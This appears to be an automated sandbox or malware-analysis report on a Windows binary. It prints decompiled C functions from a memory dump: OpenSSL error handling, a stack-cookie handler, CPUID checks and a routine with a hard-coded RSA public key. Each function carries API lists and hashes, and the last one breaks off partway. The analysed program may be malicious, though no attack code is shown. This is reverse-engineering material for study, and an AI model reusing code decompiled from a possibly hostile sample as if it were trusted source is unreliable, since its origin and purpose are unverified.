                                                              				char* _t63;
                                                              				char _t64;
                                                              				signed short* _t69;
                                                              				char* _t73;
                                                              				void* _t76;
                                                              				int _t80;
                                                              				void* _t81;
                                                              				signed int _t82;
                                                              				void* _t83;
                                                              
                                                              				E00C6BB10(0x208);
                                                              				_t43 =  *0xcc5970; // 0x851ab4dd
                                                              				_v8 = _t43 ^ _t82;
                                                              				_t81 = GetStdHandle(0xfffffff4);
                                                              				if(_t81 == 0 || GetFileType(_t81) == 0) {
                                                              					_t63 = _a4;
                                                              					_t46 = _t63;
                                                              					_t73 =  &(_t46[1]);
                                                              					do {
                                                              						_t64 =  *_t46;
                                                              						_t46 =  &(_t46[1]);
                                                              					} while (_t64 != 0);
                                                              					_t80 = _t46 - _t73 + 1;
                                                              					E00C6C610(_t80 + _t80);
                                                              					_t81 = _t83;
                                                              					if(_t81 != 0) {
                                                              						_t50 = MultiByteToWideChar(0, 0, _t63, _t80, _t81, _t80);
                                                              						if(_t50 != 0 || _t80 <= 0) {
                                                              							L13:
                                                              							_t51 = 0;
                                                              							if(_t80 <= 0) {
                                                              								L25:
                                                              								E00C6C710( &_v520, 0xff, _t81,  &_a8);
                                                              								_t74 = 0;
                                                              								_v10 = 0;
                                                              								if(GetVersion() >= 0x80000000 || E00BA78F0() <= 0) {
                                                              									_t74 =  &_v520;
                                                              									_t55 = MessageBoxW(0,  &_v520, L"OpenSSL: FATAL", 0x10);
                                                              								} else {
                                                              									_t81 = RegisterEventSourceW(0, L"OpenSSL");
                                                              									if(_t81 != 0) {
                                                              										_v524 =  &_v520;
                                                              										ReportEventW(_t81, 1, 0, 0, 0, 1, 0,  &_v524, 0);
                                                              										_t55 = DeregisterEventSource(_t81);
                                                              									}
                                                              								}
                                                              								goto L30;
                                                              							} else {
                                                              								goto L14;
                                                              							}
                                                              							do {
                                                              								L14:
                                                              								if( *((short*)(_t81 + _t51 * 2)) != 0x25) {
                                                              									goto L24;
                                                              								}
                                                              								_t69 = _t81 + 2 + _t51 * 2;
                                                              								while(1) {
                                                              									L16:
                                                              									_t76 = ( *_t69 & 0x0000ffff) + 0xffffffd6;
                                                              									if(_t76 > 0x49) {
                                                              										goto L24;
                                                              									}
                                                              									switch( *((intOrPtr*)(( *(_t76 + 0xba7c20) & 0x000000ff) * 4 +  &M00BA7C08))) {
                                                              										case 0:
                                                              											_t51 = _t51 + 1;
                                                              											_t69 =  &(_t69[1]);
                                                              											goto L16;
                                                              										case 1:
                                                              											__edx = 0x63;
                                                              											goto L23;
                                                              										case 2:
                                                              											__edx = 0x73;
                                                              											L23:
                                                              											 *((short*)(__esi + 2 + __eax * 2)) = __dx;
                                                              											goto L24;
                                                              										case 3:
                                                              											__ecx = 0x43;
                                                              											 *((short*)(__esi + 2 + __eax * 2)) = __cx;
                                                              											goto L24;
                                                              										case 4:
                                                              											__ecx = 0x53;
                                                              											 *((short*)(__esi + 2 + __eax * 2)) = __cx;
                                                              											goto L24;
                                                              										case 5:
                                                              											goto L24;
                                                              									}
                                                              								}
                                                              								L24:
                                                              								_t51 = _t51 + 1;
                                                              							} while (_t51 < _t80);
                                                              							goto L25;
                                                              						} else {
                                                              							do {
                                                              								 *((short*)(_t81 + _t50 * 2)) = _a4[_t50];
                                                              								_t50 = _t50 + 1;
                                                              							} while (_t50 < _t80);
                                                              							goto L13;
                                                              						}
                                                              					}
                                                              					_t81 = L"no stack?";
                                                              					goto L25;
                                                              				} else {
                                                              					_t62 = E00C6C7E0( &_v520, 0x200, _a4,  &_a8);
                                                              					if(_t62 < 0) {
                                                              						_t62 = 0x200;
                                                              					}
                                                              					_t74 =  &_v520;
                                                              					_t55 = WriteFile(_t81,  &_v520, _t62,  &_v524, 0);
                                                              					L30:
                                                              					return E00C69C26(_t55, _t63, _v8 ^ _t82, _t74, _t80, _t81);
                                                              				}
                                                              			}

























                                                              0x00ba7b31
                                                              0x00ba7b36
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba7b24
                                                              0x00ba7b5a
                                                              0x00ba7b5a
                                                              0x00ba7b5b
                                                              0x00000000
                                                              0x00ba7af0
                                                              0x00ba7af0
                                                              0x00ba7af8
                                                              0x00ba7afc
                                                              0x00ba7afd
                                                              0x00000000
                                                              0x00ba7af0
                                                              0x00ba7ae4
                                                              0x00ba7aca
                                                              0x00000000
                                                              0x00ba7a63
                                                              0x00ba7a77
                                                              0x00ba7a81
                                                              0x00ba7a83
                                                              0x00ba7a83
                                                              0x00ba7a92
                                                              0x00ba7a9a
                                                              0x00ba7bee
                                                              0x00ba7c04
                                                              0x00ba7c04

                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F4,00000000,00000000,00000000,?,00BA7C89,%s:%d: OpenSSL internal error: %s,?,?,000000B1,00B964AF,assertion failed: EVP_CIPHER_CTX_iv_length(ctx) <= (int)sizeof(ctx->iv),crypto\evp\evp_enc.c,000000B1), ref: 00BA7A4C
                                                              • GetFileType.KERNEL32(00000000,?,?,?,00000000,00000001,?,?,?,?,?,?,?,00000001,00000004,00000000), ref: 00BA7A59
                                                              • _vswprintf_s.LIBCMT ref: 00BA7A77
                                                                • Part of subcall function 00C6C7E0: __vsnprintf_l.LIBCMT ref: 00C6C7F3
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA7A9A
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA7ADC
                                                              • _vswprintf_s.LIBCMT ref: 00BA7B70
                                                              • GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,00000001,?,?,?,?,?,?,?), ref: 00BA7B7E
                                                              • RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 00BA7B9B
                                                              • ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00BA7BC9
                                                              • DeregisterEventSource.ADVAPI32(00000000), ref: 00BA7BD0
                                                              • MessageBoxW.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00BA7BE8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Event$FileSource_vswprintf_s$ByteCharDeregisterHandleMessageMultiRegisterReportTypeVersionWideWrite__vsnprintf_l
                                                              • String ID: OpenSSL$OpenSSL: FATAL$no stack?
                                                              • API String ID: 1577032427-278800372
                                                              • Opcode ID: c2a2d1c7a1ca49b6465e48809094a658364ff60ca1a5b94ca68b91d5335eca18
                                                              • Instruction ID: 5b49c8b872123600a92a8a724c3114f0e21f8552efde0a0e9a25a0e2e9bd9ef6
                                                              • Opcode Fuzzy Hash: c2a2d1c7a1ca49b6465e48809094a658364ff60ca1a5b94ca68b91d5335eca18
                                                              • Instruction Fuzzy Hash: 215136B168C315ABD7209B10CC99FAF73B9EF46701F5084D8FA169B191EF709A44C7A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 85%
                                                              			E00C69C26(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                              				intOrPtr _v0;
                                                              				void* _v804;
                                                              				intOrPtr _v808;
                                                              				intOrPtr _v812;
                                                              				intOrPtr _t6;
                                                              				intOrPtr _t11;
                                                              				intOrPtr _t12;
                                                              				intOrPtr _t13;
                                                              				long _t17;
                                                              				intOrPtr _t21;
                                                              				intOrPtr _t22;
                                                              				intOrPtr _t25;
                                                              				intOrPtr _t26;
                                                              				intOrPtr _t27;
                                                              				intOrPtr* _t31;
                                                              				void* _t34;
                                                              
                                                              				_t27 = __esi;
                                                              				_t26 = __edi;
                                                              				_t25 = __edx;
                                                              				_t22 = __ecx;
                                                              				_t21 = __ebx;
                                                              				_t6 = __eax;
                                                              				_t34 = _t22 -  *0xcc5970; // 0x851ab4dd
                                                              				if(_t34 == 0) {
                                                              					asm("repe ret");
                                                              				}
                                                              				 *0xcc9640 = _t6;
                                                              				 *0xcc963c = _t22;
                                                              				 *0xcc9638 = _t25;
                                                              				 *0xcc9634 = _t21;
                                                              				 *0xcc9630 = _t27;
                                                              				 *0xcc962c = _t26;
                                                              				 *0xcc9658 = ss;
                                                              				 *0xcc964c = cs;
                                                              				 *0xcc9628 = ds;
                                                              				 *0xcc9624 = es;
                                                              				 *0xcc9620 = fs;
                                                              				 *0xcc961c = gs;
                                                              				asm("pushfd");
                                                              				_pop( *0xcc9650);
                                                              				 *0xcc9644 =  *_t31;
                                                              				 *0xcc9648 = _v0;
                                                              				 *0xcc9654 =  &_a4;
                                                              				 *0xcc9590 = 0x10001;
                                                              				_t11 =  *0xcc9648; // 0x0
                                                              				 *0xcc9544 = _t11;
                                                              				 *0xcc9538 = 0xc0000409;
                                                              				 *0xcc953c = 1;
                                                              				_t12 =  *0xcc5970; // 0x851ab4dd
                                                              				_v812 = _t12;
                                                              				_t13 =  *0xcc5974; // 0x7ae54b22
                                                              				_v808 = _t13;
                                                              				 *0xcc9588 = IsDebuggerPresent();
                                                              				_push(1);
                                                              				E00C78CC1(_t14);
                                                              				SetUnhandledExceptionFilter(0);
                                                              				_t17 = UnhandledExceptionFilter(0xcbdab8);
                                                              				if( *0xcc9588 == 0) {
                                                              					_push(1);
                                                              					E00C78CC1(_t17);
                                                              				}
                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                              			}

                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32 ref: 00C6EC4A
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C6EC5F
                                                              • UnhandledExceptionFilter.KERNEL32(00CBDAB8), ref: 00C6EC6A
                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00C6EC86
                                                              • TerminateProcess.KERNEL32(00000000), ref: 00C6EC8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                              • String ID: "Kz
                                                              • API String ID: 2579439406-1965083730
                                                              • Opcode ID: f6a46bf52e25244790b8a234d372410ca0c20d823fa7ce35a70eb082c0544453
                                                              • Instruction ID: 627b26f11f8a06686cbd62f9bcd1b5f7e556a7fb62d3e84cb59b271d58894092
                                                              • Opcode Fuzzy Hash: f6a46bf52e25244790b8a234d372410ca0c20d823fa7ce35a70eb082c0544453
                                                              • Instruction Fuzzy Hash: 8521BEB4802204DFC791DF69F98DB8C3BA4FB08324F60419AF509877A1E7B49986CF09
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00B91000(void* __ecx) {
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				char* _t13;
                                                              				void* _t19;
                                                              				unsigned int _t20;
                                                              				void* _t22;
                                                              				intOrPtr _t23;
                                                              				char _t25;
                                                              				void* _t27;
                                                              				void _t28;
                                                              				signed int _t30;
                                                              				int _t33;
                                                              				char* _t35;
                                                              				void _t37;
                                                              				void* _t38;
                                                              				void* _t40;
                                                              				void* _t45;
                                                              				void* _t46;
                                                              				void* _t47;
                                                              				void* _t48;
                                                              				void* _t49;
                                                              				void* _t50;
                                                              				void* _t52;
                                                              
                                                              				_t44 = E00C69D40(__ecx, _t52, 0x21, 1);
                                                              				_t13 = "-----BEGIN RSA PUBLIC KEY-----\nMIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPD\nwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1Izkq\nXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5\nH08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJUQ57w3jZpOnpFXSZoUy1YD7Y3Cu+n/Q\n6cEft6t29/FQgacXmeA2ajb7ssSbSntBpTpoyGc/kKoaihYPrHtNRhkMcZQayy5a\nXTgYtEjhzJAC+esXiTYqklWMXJS1EmUpoQIBAw==\n-----END RSA PUBLIC KEY-----\n";
                                                              				_t48 = _t47 + 8;
                                                              				 *((intOrPtr*)(_t48 + 0x14)) = _t12;
                                                              				_t35 =  &(_t13[1]);
                                                              				do {
                                                              					_t25 =  *_t13;
                                                              					_t13 =  &(_t13[1]);
                                                              					_t53 = _t25;
                                                              				} while (_t25 != 0);
                                                              				E00B979C0("-----BEGIN RSA PUBLIC KEY-----\nMIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPD\nwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1Izkq\nXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5\nH08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJUQ57w3jZpOnpFXSZoUy1YD7Y3Cu+n/Q\n6cEft6t29/FQgacXmeA2ajb7ssSbSntBpTpoyGc/kKoaihYPrHtNRhkMcZQayy5a\nXTgYtEjhzJAC+esXiTYqklWMXJS1EmUpoQIBAw==\n-----END RSA PUBLIC KEY-----\n", _t13 - _t35, _t44);
                                                              				_t23 = E00C69D40(_t25, _t53, 0x41, 1);
                                                              				_t49 = _t48 + 0x14;
                                                              				 *((char*)(_t49 + 0x10)) = 0;
                                                              				 *((short*)(_t49 + 0x11)) = 0;
                                                              				_t46 = 0;
                                                              				while(1) {
                                                              					E00C69C35(_t38, _t44, _t49 + 0x14, "%02x",  *(_t44 + _t46) & 0x000000ff);
                                                              					_t19 = _t49 + 0x1c;
                                                              					_t50 = _t49 + 0xc;
                                                              					_t27 = _t19;
                                                              					do {
                                                              						_t37 =  *_t19;
                                                              						_t19 = _t19 + 1;
                                                              					} while (_t37 != 0);
                                                              					_t20 = _t19 - _t27;
                                                              					_t45 = _t27;
                                                              					_t40 = _t23 - 1;
                                                              					do {
                                                              						_t28 =  *(_t40 + 1);
                                                              						_t40 = _t40 + 1;
                                                              					} while (_t28 != 0);
                                                              					_t30 = _t20 >> 2;
                                                              					_t33 = memcpy(_t40, _t45, _t30 << 2) & 0x00000003;
                                                              					_t46 = _t46 + 1;
                                                              					_t22 = memcpy(_t45 + _t30 + _t30, _t45, _t33);
                                                              					_t49 = _t50 + 0x18;
                                                              					_t38 = _t45 + _t33 + _t33;
                                                              					if(_t46 < 0x20) {
                                                              						_t44 =  *((intOrPtr*)(_t49 + 0x14));
                                                              						continue;
                                                              					}
                                                              					 *((char*)(_t23 + 0x20)) = 0;
                                                              					 *0xeca9a8 = _t23;
                                                              					return _t22;
                                                              				}
                                                              			}

                                                              APIs
                                                              Strings
                                                              • %02x, xrefs: 00B91061
                                                              • -----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU, xrefs: 00B91012, 00B9102B, 00B9102C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: _calloc$__calloc_impl_sprintf
                                                              • String ID: %02x$-----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU
                                                              • API String ID: 2194232006-3898999373
                                                              • Opcode ID: 6416fe112413a74399c2b387d0bcac20713bf5737988ccd0c591cca9e3dab1e8
                                                              • Instruction ID: 487c5ecd2aa5dc62442994833136a2adbc822c0c493a915849723a86cb985f46
                                                              • Opcode Fuzzy Hash: 6416fe112413a74399c2b387d0bcac20713bf5737988ccd0c591cca9e3dab1e8
                                                              • Instruction Fuzzy Hash: E9115B215083862BDF20DF385C96BB77BC5DB81700F0445BDF8869B241EAB3998C93E2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 22%
                                                              			E00BA3680(intOrPtr _a8) {
                                                              				signed int _t20;
                                                              				signed int _t22;
                                                              				signed int _t25;
                                                              				signed int _t26;
                                                              				signed int _t27;
                                                              				signed int _t30;
                                                              				unsigned int _t39;
                                                              				signed char _t44;
                                                              				signed int _t45;
                                                              				signed int _t50;
                                                              				signed int _t53;
                                                              				signed int _t58;
                                                              				void* _t65;
                                                              				signed int _t68;
                                                              				signed int _t70;
                                                              
                                                              				_t50 = 0;
                                                              				asm("pushfd");
                                                              				_pop(_t20);
                                                              				_push(_t20 ^ 0x00200000);
                                                              				asm("popfd");
                                                              				asm("pushfd");
                                                              				_pop(_t22);
                                                              				_t44 = _t20 ^ _t22;
                                                              				asm("bt ecx, 0x15");
                                                              				if(0 >= 0) {
                                                              					return 0;
                                                              				}
                                                              				 *(_a8 + 8) = 0;
                                                              				asm("cpuid");
                                                              				_t25 = 0 | _t39 != 0x756e6547;
                                                              				_t26 = _t25 & 0xffffff00 | 0 != 0x49656e69;
                                                              				_t27 = _t26 & 0xffffff00 | _t44 != 0x6c65746e;
                                                              				_t68 = _t25 | _t26 | _t27;
                                                              				if(_t68 == 0 || (_t27 & 0xffffff00 | _t39 != 0x68747541 | (_t27 & 0xffffff00 | _t39 != 0x68747541) & 0xffffff00 | 0 != 0x69746e65 | ((_t27 & 0xffffff00 | _t39 != 0x68747541) & 0xffffff00 | 0 != 0x69746e65) & 0xffffff00 | _t44 != 0x444d4163) != 0) {
                                                              					L8:
                                                              					__eflags = 0 - 7;
                                                              					if(0 >= 7) {
                                                              						__eflags = 0;
                                                              						asm("cpuid");
                                                              						 *(_a8 + 8) = _t39;
                                                              					}
                                                              					__eflags = 0 - 4;
                                                              					_t53 = 0xffffffff;
                                                              					if(0 >= 4) {
                                                              						asm("cpuid");
                                                              						_t53 = 0xbad;
                                                              						__eflags = 0xbad;
                                                              					}
                                                              					_t28 = 1;
                                                              					_t45 = 0;
                                                              					asm("cpuid");
                                                              					_t50 = _t50 & 0xbfefffff;
                                                              					__eflags = _t68;
                                                              					if(__eflags == 0) {
                                                              						_t50 = _t50 | 0x40000000;
                                                              						_t28 = 1;
                                                              						__eflags = 1 - 0xf;
                                                              						if(1 == 0xf) {
                                                              							_t50 = _t50 | 0x00100000;
                                                              							__eflags = _t50;
                                                              						}
                                                              					}
                                                              					asm("bt edx, 0x1c");
                                                              					if(__eflags < 0) {
                                                              						_t50 = _t50 & 0xefffffff;
                                                              						__eflags = _t53;
                                                              						if(_t53 != 0) {
                                                              							_t50 = _t50 | 0x10000000;
                                                              							__eflags = _t39 >> 0x10 - 1;
                                                              							if(_t39 >> 0x10 <= 1) {
                                                              								_t50 = _t50 & 0xefffffff;
                                                              								__eflags = _t50;
                                                              							}
                                                              						}
                                                              					}
                                                              					goto L19;
                                                              				} else {
                                                              					asm("cpuid");
                                                              					if(0x80000000 < 0x80000001) {
                                                              						goto L8;
                                                              					}
                                                              					asm("cpuid");
                                                              					_t68 = (_t68 | _t44) & 0x00000801;
                                                              					if(0x80000000 < 0x80000008) {
                                                              						goto L8;
                                                              					} else {
                                                              						asm("cpuid");
                                                              						_t65 = (_t44 & 0x000000ff) + 1;
                                                              						_t28 = 1;
                                                              						_t45 = 0;
                                                              						asm("cpuid");
                                                              						asm("bt edx, 0x1c");
                                                              						if(0 < 0 && (_t39 >> 0x00000010 & 0x000000ff) <= _t65) {
                                                              							_t50 = 0;
                                                              						}
                                                              						L19:
                                                              						_t58 = _t50;
                                                              						_t70 = _t68 & 0x00000800 | _t45 & 0xfffff7ff;
                                                              						asm("bt ecx, 0x1b");
                                                              						if(_t70 >= 0) {
                                                              							L23:
                                                              							_t70 = _t70 & 0xefffe7ff;
                                                              							 *(_a8 + 8) =  *(_a8 + 8) & 0xffffffdf;
                                                              							L24:
                                                              							return _t58;
                                                              						}
                                                              						asm("xgetbv");
                                                              						_t30 = _t28 & 0x00000006;
                                                              						if(_t30 == 6) {
                                                              							goto L24;
                                                              						}
                                                              						if(_t30 != 2) {
                                                              							_t70 = _t70 & 0xfdfffffd;
                                                              							_t58 = _t58 & 0xfeffffff;
                                                              						}
                                                              						goto L23;
                                                              					}
                                                              				}
                                                              			}


                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                              • API String ID: 0-1714976780
                                                              • Opcode ID: 0267287f670431e7a6d0a9e082e982835e0205c0dfa79dfcdf529b1d0aab54d9
                                                              • Instruction ID: 5d90352bcb4e9e4779b14dfaf1a295652d2f1025917426a8aaaacfb7240995d7
                                                              • Opcode Fuzzy Hash: 0267287f670431e7a6d0a9e082e982835e0205c0dfa79dfcdf529b1d0aab54d9
                                                              • Instruction Fuzzy Hash: FF313ABBA586120BFB789C3C884536D60C39392B30F2AC7B9F527C36D0E878CE815251
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E00BA8340(intOrPtr __ecx, signed int __edx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t208;
                                                              				signed char _t210;
                                                              				signed int _t215;
                                                              				signed char _t216;
                                                              				signed int _t217;
                                                              				signed char _t218;
                                                              				signed int _t225;
                                                              				signed int _t230;
                                                              				signed int _t231;
                                                              				signed int _t234;
                                                              				signed int _t239;
                                                              				signed int _t240;
                                                              				signed int _t244;
                                                              				signed int _t245;
                                                              				signed int _t247;
                                                              				signed int _t249;
                                                              				signed int _t252;
                                                              				signed int _t253;
                                                              				signed int _t256;
                                                              				signed int _t258;
                                                              				signed int _t259;
                                                              				signed int _t261;
                                                              				signed int _t262;
                                                              				signed int _t264;
                                                              				signed int _t266;
                                                              				signed int _t271;
                                                              				signed char _t284;
                                                              				intOrPtr _t285;
                                                              				intOrPtr _t286;
                                                              				intOrPtr _t287;
                                                              				intOrPtr _t288;
                                                              				signed int _t290;
                                                              				signed int _t293;
                                                              				signed int _t294;
                                                              				signed int _t300;
                                                              				signed char _t301;
                                                              				signed int _t311;
                                                              				signed int _t321;
                                                              				signed int _t327;
                                                              				signed int _t329;
                                                              				intOrPtr _t332;
                                                              				signed int _t333;
                                                              				signed int _t334;
                                                              				intOrPtr _t336;
                                                              				signed char _t337;
                                                              				intOrPtr _t338;
                                                              				intOrPtr _t344;
                                                              				signed int _t346;
                                                              				intOrPtr _t347;
                                                              				signed int _t348;
                                                              				signed int _t350;
                                                              				signed int _t351;
                                                              				intOrPtr _t353;
                                                              				intOrPtr* _t354;
                                                              				intOrPtr _t355;
                                                              				signed int _t361;
                                                              				intOrPtr _t362;
                                                              				signed int _t366;
                                                              				signed int _t370;
                                                              				signed int _t373;
                                                              				signed int _t394;
                                                              				signed long long _t395;
                                                              				signed long long _t397;
                                                              				signed long long _t399;
                                                              				signed long long _t404;
                                                              				signed int _t405;
                                                              
                                                              				E00C6BB10(0x70);
                                                              				_t208 =  *0xcc5970; // 0x851ab4dd
                                                              				 *(_t373 + 0x6c) = _t208 ^ _t373;
                                                              				_t210 =  *(_t373 + 0x78);
                                                              				_t284 =  *(_t373 + 0x78);
                                                              				_t366 =  *(_t373 + 0x90);
                                                              				_t346 =  *(_t373 + 0x9c);
                                                              				 *(_t373 + 0x1c) = __edx;
                                                              				_t319 = 0;
                                                              				 *(_t373 + 0x14) = _t210;
                                                              				 *((intOrPtr*)(_t373 + 0x18)) = __ecx;
                                                              				 *(_t373 + 0x2c) = 0;
                                                              				 *(_t373 + 0x24) = 0;
                                                              				 *(_t373 + 0x28) = 0;
                                                              				 *(_t373 + 0x20) = 0;
                                                              				 *(_t373 + 0x3c) = 0;
                                                              				if(_t366 < 0) {
                                                              					_t366 = 6;
                                                              				}
                                                              				asm("fldz");
                                                              				asm("fcom st0, st1");
                                                              				asm("fnstsw ax");
                                                              				if((_t210 & 0x00000005) != 0) {
                                                              					_t210 =  *(_t373 + 0x9c);
                                                              					__eflags = _t210 & 0x00000002;
                                                              					if((_t210 & 0x00000002) == 0) {
                                                              						__eflags = _t210 & 0x00000004;
                                                              						if((_t210 & 0x00000004) != 0) {
                                                              							 *(_t373 + 0x2c) = 0x20;
                                                              						}
                                                              					} else {
                                                              						 *(_t373 + 0x2c) = 0x2b;
                                                              					}
                                                              				} else {
                                                              					 *(_t373 + 0x2c) = 0x2d;
                                                              				}
                                                              				asm("fld1");
                                                              				if(_t346 != 2) {
                                                              					_t290 = _t346;
                                                              					 *(_t373 + 0x30) = _t290;
                                                              					__eflags = _t346;
                                                              					if(_t346 == 0) {
                                                              						goto L44;
                                                              					} else {
                                                              						goto L21;
                                                              					}
                                                              				} else {
                                                              					asm("fucomp st3");
                                                              					asm("fnstsw ax");
                                                              					if((_t210 & 0x00000044) != 0) {
                                                              						_t404 =  *0xc81cf0;
                                                              						asm("fcomp st0, st3");
                                                              						asm("fnstsw ax");
                                                              						__eflags = _t210 & 0x00000041;
                                                              						if((_t210 & 0x00000041) != 0) {
                                                              							__eflags = _t366;
                                                              							if(__eflags != 0) {
                                                              								if(__eflags <= 0) {
                                                              									asm("fxch st0, st2");
                                                              									goto L37;
                                                              								} else {
                                                              									st2 = _t404;
                                                              									st0 = _t404;
                                                              									st1 = _t404;
                                                              									st0 = _t404;
                                                              									_t210 = E00BA7DC0(_t366);
                                                              									_t405 =  *(_t373 + 0x90);
                                                              									_t373 = _t373 + 4;
                                                              									asm("fcom st0, st1");
                                                              									asm("fnstsw ax");
                                                              									st1 = _t405;
                                                              									asm("fldz");
                                                              									asm("fld1");
                                                              									asm("fxch st0, st2");
                                                              									asm("fxch st0, st3");
                                                              									__eflags = _t210 & 0x00000001;
                                                              									if((_t210 & 0x00000001) != 0) {
                                                              										L37:
                                                              										_t290 = 0;
                                                              									} else {
                                                              										goto L18;
                                                              									}
                                                              								}
                                                              							} else {
                                                              								asm("fxch st0, st2");
                                                              								asm("fcom st0, st1");
                                                              								asm("fnstsw ax");
                                                              								__eflags = _t210 & 0x00000001;
                                                              								if((_t210 & 0x00000001) == 0) {
                                                              									L18:
                                                              									_t290 = 1;
                                                              								} else {
                                                              									_t290 = 0;
                                                              								}
                                                              							}
                                                              							asm("fxch st0, st2");
                                                              						} else {
                                                              							_t290 = 1;
                                                              						}
                                                              					} else {
                                                              						_t290 = 0;
                                                              					}
                                                              					 *(_t373 + 0x30) = _t290;
                                                              					L21:
                                                              					_t395 = st4;
                                                              					asm("fucomp st4");
                                                              					asm("fnstsw ax");
                                                              					if((_t210 & 0x00000044) == 0) {
                                                              						asm("fxch st0, st3");
                                                              						asm("fcom st0, st1");
                                                              						asm("fnstsw ax");
                                                              						if((_t210 & 0x00000005) == 0) {
                                                              							do {
                                                              								asm("fxch st0, st3");
                                                              								_t319 = _t319 - 1;
                                                              								_t395 = _t395 * st2;
                                                              								asm("fcom st0, st1");
                                                              								asm("fnstsw ax");
                                                              								asm("fxch st0, st3");
                                                              							} while ((_t210 & 0x00000005) != 0);
                                                              							 *(_t373 + 0x3c) = _t319;
